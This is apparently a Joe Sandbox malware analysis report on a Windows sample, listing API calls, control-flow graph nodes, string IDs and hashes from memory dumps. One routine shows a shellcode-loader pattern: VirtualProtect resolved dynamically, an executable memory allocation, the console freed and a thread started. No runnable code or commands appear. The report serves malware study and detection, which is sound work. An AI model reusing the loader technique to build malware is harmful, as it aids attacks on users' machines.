                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 47a218d386442900e253073fa0c05f2342f381bffaba30786822a93b33d438cc
                                                                                    • Instruction ID: 5dc71746e08e257a5260dd158b447e4ec1272d7c708de5972d566ee3c8b01dbc
                                                                                    • Opcode Fuzzy Hash: 47a218d386442900e253073fa0c05f2342f381bffaba30786822a93b33d438cc
                                                                                    • Instruction Fuzzy Hash: D7F06532611328DBCB16C78CC456BA973ADFB45B51F214056F601D7251C2B4DD00CBC4

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualProtect,?,0000000006:1@0000000005:@), ref: 006E223C
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 006E2243
                                                                                    • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 006E2259
                                                                                    • FreeConsole.KERNEL32 ref: 006E2261
                                                                                      • Part of subcall function 006E1D3C: _Deallocate.LIBCONCRT ref: 006E1DD3
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,00000188,0070AAC0,00000000,00000000), ref: 006E2290
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 006E2299
                                                                                      • Part of subcall function 006E2520: _Deallocate.LIBCONCRT ref: 006E252F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Deallocate$AddressAllocConsoleCreateFreeHandleModuleObjectProcSingleThreadVirtualWait
                                                                                    • String ID: 0000000006:1@0000000005:@$VirtualProtect$kernel32.dll
                                                                                    • API String ID: 2719435794-2246029265
                                                                                    • Opcode ID: bc34a675985294e897b1a14b54d4790ff329292851a3ca08830b56c448a0b463
                                                                                    • Instruction ID: 8cbf63f863f99ed944810893150b2c3c47eb686792cc51feea2516f0c577c7a2
                                                                                    • Opcode Fuzzy Hash: bc34a675985294e897b1a14b54d4790ff329292851a3ca08830b56c448a0b463
                                                                                    • Instruction Fuzzy Hash: A911C4B2609344FAE254BB71EC4BF6B37ADDB84730F10871DF105861D2ED78A94486A9

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3907804496
                                                                                    • Opcode ID: 16e253cf7d0717d77c1c177372a4ea17c802cb6c2df06780785734fa756709ef
                                                                                    • Instruction ID: 6f256a92303e733b3c34a394e202499a6f2722d417eb0a1859db650273bf4490
                                                                                    • Opcode Fuzzy Hash: 16e253cf7d0717d77c1c177372a4ea17c802cb6c2df06780785734fa756709ef
                                                                                    • Instruction Fuzzy Hash: 52B1E270A04A4DAFDB11DF99C891BBE7BB3AF45320F148158E7129B392C7709D42CB65

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,A418D8C2,?,006F28B7,?,?,?,00000000), ref: 006F286B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: api-ms-$ext-ms-
                                                                                    • API String ID: 3664257935-537541572
                                                                                    • Opcode ID: 1e00d2a8648546267496d1ae15215397481ac3e6c110aead2176d8eb131da900
                                                                                    • Instruction ID: 7dfb0d62a690308559be037b2104d37102783b1a9232fd64e0a3507498ee1244
                                                                                    • Opcode Fuzzy Hash: 1e00d2a8648546267496d1ae15215397481ac3e6c110aead2176d8eb131da900
                                                                                    • Instruction Fuzzy Hash: 0B210832A0021AE7D7319B25DC65FAA375ABB413F0F104224EE16A73D0DA34ED05CEE4

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,006E2333,?,?,00000000), ref: 006E6AA4
                                                                                    • GetExitCodeThread.KERNEL32(?,00000000,?,?,?,006E2333,?,?,00000000), ref: 006E6ABD
                                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?,006E2333,?,?,00000000), ref: 006E6ACF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ChangeCloseCodeExitFindNotificationObjectSingleThreadWait
                                                                                    • String ID: 3#n
                                                                                    • API String ID: 3816883391-3452942821
                                                                                    • Opcode ID: 60671adca30b5b618e97532934937f38947569e514ae74001fbdc5f0c12e2d8f
                                                                                    • Instruction ID: f3d639237c5d8da9f53ea6c68d38e398d58c67a55489f1a9910917cba4668eef
                                                                                    • Opcode Fuzzy Hash: 60671adca30b5b618e97532934937f38947569e514ae74001fbdc5f0c12e2d8f
                                                                                    • Instruction Fuzzy Hash: 95F08271941215EBDB108F29DC09B9A3B69EB117B0F288320F926E62E0DB74DD81D784

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00708A98,0000000C), ref: 006EB776
                                                                                    • ExitThread.KERNEL32 ref: 006EB77D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastThread
                                                                                    • String ID: mEn
                                                                                    • API String ID: 1611280651-2555016830
                                                                                    • Opcode ID: d32fb7c3e8bbeb5d2f93278f65f0026b86d0ec3a5934db0a58e7ec012db43c74
                                                                                    • Instruction ID: 5a3e38ff9fbfb56440278870549fcb0559d18048c5350ccec061bbecaa762e5d
                                                                                    • Opcode Fuzzy Hash: d32fb7c3e8bbeb5d2f93278f65f0026b86d0ec3a5934db0a58e7ec012db43c74
                                                                                    • Instruction Fuzzy Hash: BFF08C71900309DFDB41ABB1C84AB6E3B66EF50710F20425EF10297292CF3899018BA9

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(?,?,Function_0000B763,00000000,00000000,?), ref: 006EB908
                                                                                    • GetLastError.KERNEL32(?,?,?,?,006E22F4,00000000,00000000,006E38DA,00000000,00000000), ref: 006EB914
                                                                                    • __dosmaperr.LIBCMT ref: 006EB91B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                                                    • String ID:
                                                                                    • API String ID: 2744730728-0
                                                                                    • Opcode ID: 7e8311fcfacb709ee3eecad6e5f1acb57d2bcea3fcc4e22745468c6075e2f1e5
                                                                                    • Instruction ID: 78798a0551726f96ab09f297f8f9294c6c8cc70b7bc13a196e9fe82dbd51f43f
                                                                                    • Opcode Fuzzy Hash: 7e8311fcfacb709ee3eecad6e5f1acb57d2bcea3fcc4e22745468c6075e2f1e5
                                                                                    • Instruction Fuzzy Hash: CF01B172912349AFDF15AFA2DC06BEF3BAAEF40360F004128F90192251DB70CE10DB94

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 259 6eb818-6eb825 call 6f243a 262 6eb827-6eb82f 259->262 263 6eb865-6eb868 ExitThread 259->263 262->263 264 6eb831-6eb835 262->264 265 6eb83c-6eb842 264->265 266 6eb837 call 6f2d4d 264->266 268 6eb84f-6eb855 265->268 269 6eb844-6eb846 265->269 266->265 268->263 270 6eb857-6eb859 268->270 269->268 271 6eb848-6eb849 CloseHandle 269->271 270->263 272 6eb85b-6eb85f FreeLibraryAndExitThread 270->272 271->268 272->263
                                                                                    APIs
                                                                                      • Part of subcall function 006F243A: GetLastError.KERNEL32(00000000,?,006EC905,006F1F64,?,?,006F2336,00000001,00000364,?,00000006,000000FF,?,006EB788,00708A98,0000000C), ref: 006F243E
                                                                                      • Part of subcall function 006F243A: SetLastError.KERNEL32(00000000), ref: 006F24E0
                                                                                    • CloseHandle.KERNEL32(?,?,?,006EB94F,?,?,006EB7C1,00000000), ref: 006EB849
                                                                                    • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,006EB94F,?,?,006EB7C1,00000000), ref: 006EB85F
                                                                                    • ExitThread.KERNEL32 ref: 006EB868
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                    • API String ID: 1991824761-0
                                                                                    • Opcode ID: fa031088fee6198586c4a58bbc6f1b8bc59dbc218b04d91d2d5e163eadc2dc2b
                                                                                    • Instruction ID: 251b07a2bad15975b66a477fec83c399465b986d8e1369c868e8b4edd1dfcd50
                                                                                    • Opcode Fuzzy Hash: fa031088fee6198586c4a58bbc6f1b8bc59dbc218b04d91d2d5e163eadc2dc2b
                                                                                    • Instruction Fuzzy Hash: 45F05E30411788ABCB211B67C808BDB3A9E6F00320F089715F968D63B4DB34DC418AA4

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000002,?,006EFFC6,006ECA0D,006ECA0D,?,00000002,A418D8C2,006ECA0D,00000002), ref: 006EFFDD
                                                                                    • TerminateProcess.KERNEL32(00000000,?,006EFFC6,006ECA0D,006ECA0D,?,00000002,A418D8C2,006ECA0D,00000002), ref: 006EFFE4
                                                                                    • ExitProcess.KERNEL32 ref: 006EFFF6
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: 585bc280639b0ad112cdf4bb7e606aae2f552e67be1a7143286fb14429025030
                                                                                    • Instruction ID: 7666b177e196dce1d367bc6209122bf6f7b91a23d5bfa1545c46538be1f2e729
                                                                                    • Opcode Fuzzy Hash: 585bc280639b0ad112cdf4bb7e606aae2f552e67be1a7143286fb14429025030
                                                                                    • Instruction Fuzzy Hash: FED06731000148EBEF512F61DC09F593F2ABF41361F04C114BA095A122DF3999529A98

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 280 6f425a-6f4279 281 6f427f-6f4281 280->281 282 6f4453 280->282 283 6f42ad-6f42d3 281->283 284 6f4283-6f42a2 call 6ec785 281->284 285 6f4455-6f4459 282->285 287 6f42d9-6f42df 283->287 288 6f42d5-6f42d7 283->288 291 6f42a5-6f42a8 284->291 287->284 290 6f42e1-6f42eb 287->290 288->287 288->290 292 6f42ed-6f42f8 call 6f5deb 290->292 293 6f42fb-6f4306 call 6f3dde 290->293 291->285 292->293 298 6f4348-6f435a 293->298 299 6f4308-6f430d 293->299 302 6f435c-6f4362 298->302 303 6f43ab-6f43cb WriteFile 298->303 300 6f430f-6f4313 299->300 301 6f4332-6f4346 call 6f39a4 299->301 304 6f441b-6f442d 300->304 305 6f4319-6f4328 call 6f3d76 300->305 322 6f432b-6f432d 301->322 309 6f4399-6f43a4 call 6f3e5c 302->309 310 6f4364-6f4367 302->310 307 6f43cd-6f43d3 GetLastError 303->307 308 6f43d6 303->308 311 6f442f-6f4435 304->311 312 6f4437-6f4449 304->312 305->322 307->308 316 6f43d9-6f43e4 308->316 321 6f43a9 309->321 317 6f4369-6f436c 310->317 318 6f4387-6f4397 call 6f4020 310->318 311->282 311->312 312->291 323 6f444e-6f4451 316->323 324 6f43e6-6f43eb 316->324 317->304 325 6f4372-6f437d call 6f3f37 317->325 327 6f4382-6f4385 318->327 321->327 322->316 323->285 328 6f43ed-6f43f2 324->328 329 6f4419 324->329 325->327 327->322 331 6f440b-6f4414 call 6ec8c9 328->331 332 6f43f4-6f4406 328->332 329->304 331->291 332->291
                                                                                    APIs
                                                                                      • Part of subcall function 006F39A4: GetConsoleOutputCP.KERNEL32(A418D8C2,00000000,00000000,006ECCE4), ref: 006F3A07
                                                                                    • WriteFile.KERNEL32(FFB05FE8,00000000,?,006ECC04,00000000,00000000,00000000,00000000,006EC9DA,?,006ECC04,006EC9DA,00000024,00708AD8,00000010,006ECCE4), ref: 006F43C3
                                                                                    • GetLastError.KERNEL32(?,006ECC04,006EC9DA,00000024,00708AD8,00000010,006ECCE4,006EC9DA,?,00000000,00000004), ref: 006F43CD
                                                                                    Similarity
                                                                                    • API ID: ConsoleErrorFileLastOutputWrite
                                                                                    • API String ID: 2915228174-0
                                                                                    • Opcode ID: 7cf72de5654b28dbbb6e771c09409367836263a3050973542f388a1ba92ff7fb
                                                                                    • Instruction ID: 981f13c336a812a7f16b5a7e4e8b26abc9e8432b3c5bd3a6bfce0b03718d8090
                                                                                    • Opcode Fuzzy Hash: 7cf72de5654b28dbbb6e771c09409367836263a3050973542f388a1ba92ff7fb
                                                                                    • Instruction Fuzzy Hash: AF61A472D0414DAEDF118FA8C844BFFBBBAAF09314F044059EA10B7642DB35DA02CB64

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 335 6f3e5c-6f3eb1 call 6e7dc0 338 6f3f26-6f3f36 call 6e701e 335->338 339 6f3eb3 335->339 341 6f3eb9 339->341 343 6f3ebf-6f3ec1 341->343 344 6f3edb-6f3f00 WriteFile 343->344 345 6f3ec3-6f3ec8 343->345 348 6f3f1e-6f3f24 GetLastError 344->348 349 6f3f02-6f3f0d 344->349 346 6f3eca-6f3ed0 345->346 347 6f3ed1-6f3ed9 345->347 346->347 347->343 347->344 348->338 349->338 350 6f3f0f-6f3f1a 349->350 350->341 351 6f3f1c 350->351 351->338
                                                                                    APIs
                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,006ECCE4,?,006F43A9,?,00000000,00000000,?,00000000,00000000), ref: 006F3EF8
                                                                                    • GetLastError.KERNEL32(?,006F43A9,?,00000000,00000000,?,00000000,00000000,00000000,006EC9DA,?,006ECC04,006EC9DA,00000024,00708AD8,00000010), ref: 006F3F1E
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastWrite
                                                                                    • API String ID: 442123175-0
                                                                                    • Opcode ID: 5699017fded25db4007d8783dbd19bcd72af557a231cbb63078770cd18f264d5
                                                                                    • Instruction ID: 629b1f6f04210fa0a261611bb82a27be71c7c37d72a7635372e6a2e0272f7d5f
                                                                                    • Opcode Fuzzy Hash: 5699017fded25db4007d8783dbd19bcd72af557a231cbb63078770cd18f264d5
                                                                                    • Instruction Fuzzy Hash: BE219130A0026DDBCB15CF19DD80AEDB7BAEF48315F1441AAEA06D7311E630DE46CB64

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 352 6f3513-6f3518 353 6f351a-6f3532 352->353 354 6f3534-6f3538 353->354 355 6f3540-6f3549 353->355 354->355 356 6f353a-6f353e 354->356 357 6f355b 355->357 358 6f354b-6f354e 355->358 359 6f35b5-6f35b9 356->359 362 6f355d-6f356a GetStdHandle 357->362 360 6f3557-6f3559 358->360 361 6f3550-6f3555 358->361 359->353 363 6f35bf-6f35c2 359->363 360->362 361->362 364 6f356c-6f356e 362->364 365 6f3597-6f35a9 362->365 364->365 367 6f3570-6f3579 GetFileType 364->367 365->359 366 6f35ab-6f35ae 365->366 366->359 367->365 368 6f357b-6f3584 367->368 369 6f358c-6f358f 368->369 370 6f3586-6f358a 368->370 369->359 371 6f3591-6f3595 369->371 370->359 371->359
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 006F355F
                                                                                    • GetFileType.KERNELBASE(00000000), ref: 006F3571
                                                                                    Similarity
                                                                                    • API ID: FileHandleType
                                                                                    • API String ID: 3000768030-0
                                                                                    • Opcode ID: be0c211a41970c390816f78097a615a94a2abbd7e944c486febb17c949821e33
                                                                                    • Instruction ID: b88dbe8da5b7ce2b9d0c953d052660cdfc915c5e0664f464570a7de8e8246186
                                                                                    • Opcode Fuzzy Hash: be0c211a41970c390816f78097a615a94a2abbd7e944c486febb17c949821e33
                                                                                    • Instruction Fuzzy Hash: 0611E67110876986C7344E3E8C88676BA96A7D6374B380B1ED3B6873F1C734DB86D640

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 423 6f22e9-6f22fd GetLastError 424 6f22ff-6f2307 call 6f2ac6 423->424 425 6f2319-6f2323 call 6f2b05 423->425 430 6f2309-6f2312 424->430 431 6f2314 424->431 432 6f2329-6f2331 call 6f1f12 425->432 433 6f2325-6f2327 425->433 434 6f238e-6f2397 SetLastError 430->434 431->425 436 6f2336-6f233c 432->436 433->434 437 6f239e-6f23a3 call 6ec9ca 434->437 438 6f2399-6f239d 434->438 440 6f234f-6f235d call 6f2b05 436->440 441 6f233e-6f234d call 6f2b05 436->441 447 6f235f-6f236d call 6f2b05 440->447 448 6f2376-6f238b call 6f2117 call 6f1f6f 440->448 449 6f236e-6f2374 call 6f1f6f 441->449 447->449 456 6f238d 448->456 449->456 456->434
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,006EB788,00708A98,0000000C), ref: 006F22ED
                                                                                    • SetLastError.KERNEL32(00000000), ref: 006F238F
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • API String ID: 1452528299-0
                                                                                    • Opcode ID: ad478ca7c1c67d9743e0fea632da5e53521dac430fc9d7681b01d8588e3bb1cb
                                                                                    • Instruction ID: 8caf1d2c9bcc29af486b58cde051951d94c84217f8fe91eed1b2d5028a983a8a
                                                                                    • Opcode Fuzzy Hash: ad478ca7c1c67d9743e0fea632da5e53521dac430fc9d7681b01d8588e3bb1cb
                                                                                    • Instruction Fuzzy Hash: E21106B320931FFAD7516BB45CE6F7A235FAB057A8F100228F710951A2EE184C0589A9
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_catch
                                                                                    • API String ID: 3886170330-0
                                                                                    • Opcode ID: 6df883c9864256a2329e09c98b26b7fdd452908505a6763f8d95f13fbb227e23
                                                                                    • Instruction ID: 6ff10009c46f210bcc6d44f2f8cc17d703171cadedcdd8916ef819fcefeb09bb
                                                                                    • Opcode Fuzzy Hash: 6df883c9864256a2329e09c98b26b7fdd452908505a6763f8d95f13fbb227e23
                                                                                    • Instruction Fuzzy Hash: 3A414C74A01245CFD724DF6AD4A4DA9B7F7FF54310B19825DE4099B3A2CB399C42CB04
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_catch
                                                                                    • API String ID: 3886170330-0
                                                                                    • API ID: Deallocate
                                                                                    • String ID:
                                                                                    • API String ID: 1075933841-0
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,?,?,006F2336,00000001,00000364,?,00000006,000000FF,?,006EB788,00708A98,0000000C), ref: 006F1F53
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000000,006F89B1,?,?,006F89B1,00000220,?,00000000,?), ref: 006F5FBC
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    APIs
                                                                                      • Part of subcall function 006F22E9: GetLastError.KERNEL32(?,?,006EB788,00708A98,0000000C), ref: 006F22ED
                                                                                      • Part of subcall function 006F22E9: SetLastError.KERNEL32(00000000), ref: 006F238F
                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 006FB6F4
                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 006FB73D
                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 006FB74C
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 006FB794
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 006FB7B3
                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                    • String ID: 4Cp
                                                                                    • API String ID: 415426439-1467152804
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,006FB731,00000002,00000000,?,?,?,006FB731,?,00000000), ref: 006FB4AC
                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,006FB731,00000002,00000000,?,?,?,006FB731,?,00000000), ref: 006FB4D5
                                                                                    • GetACP.KERNEL32(?,?,006FB731,?,00000000), ref: 006FB4EA
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: ACP$OCP
                                                                                    • API String ID: 2299586839-711371036
                                                                                    APIs
                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 006F82A2
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 006F8396
                                                                                    • FindClose.KERNEL32(00000000), ref: 006F83D5
                                                                                    • FindClose.KERNEL32(00000000), ref: 006F8408
                                                                                    • API ID: Find$CloseFile$FirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 1164774033-0
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 006E7B41
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 006E7C0D
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006E7C26
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 006E7C30
                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 254469556-0
                                                                                    APIs
                                                                                      • Part of subcall function 006F22E9: GetLastError.KERNEL32(?,?,006EB788,00708A98,0000000C), ref: 006F22ED
                                                                                      • Part of subcall function 006F22E9: SetLastError.KERNEL32(00000000), ref: 006F238F
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006FB0EB
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006FB135
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006FB1FB
                                                                                    • API ID: InfoLocale$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 661929714-0
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 006EC6FE
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 006EC708
                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 006EC715
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,006F14E5,?,20001004,00000000,00000002,?,?,006F0AE7), ref: 006F2B7B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: mEn
                                                                                    • API String ID: 2299586839-2555016830
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,006F7365,?,?,?,?,?,?,00000000), ref: 006F7597
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006E7646
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 2325560087-0
                                                                                    APIs
                                                                                      • Part of subcall function 006F22E9: GetLastError.KERNEL32(?,?,006EB788,00708A98,0000000C), ref: 006F22ED
                                                                                      • Part of subcall function 006F22E9: SetLastError.KERNEL32(00000000), ref: 006F238F
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006FB33E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 3736152602-0
                                                                                    APIs
                                                                                      • Part of subcall function 006F22E9: GetLastError.KERNEL32(?,?,006EB788,00708A98,0000000C), ref: 006F22ED
                                                                                      • Part of subcall function 006F22E9: SetLastError.KERNEL32(00000000), ref: 006F238F
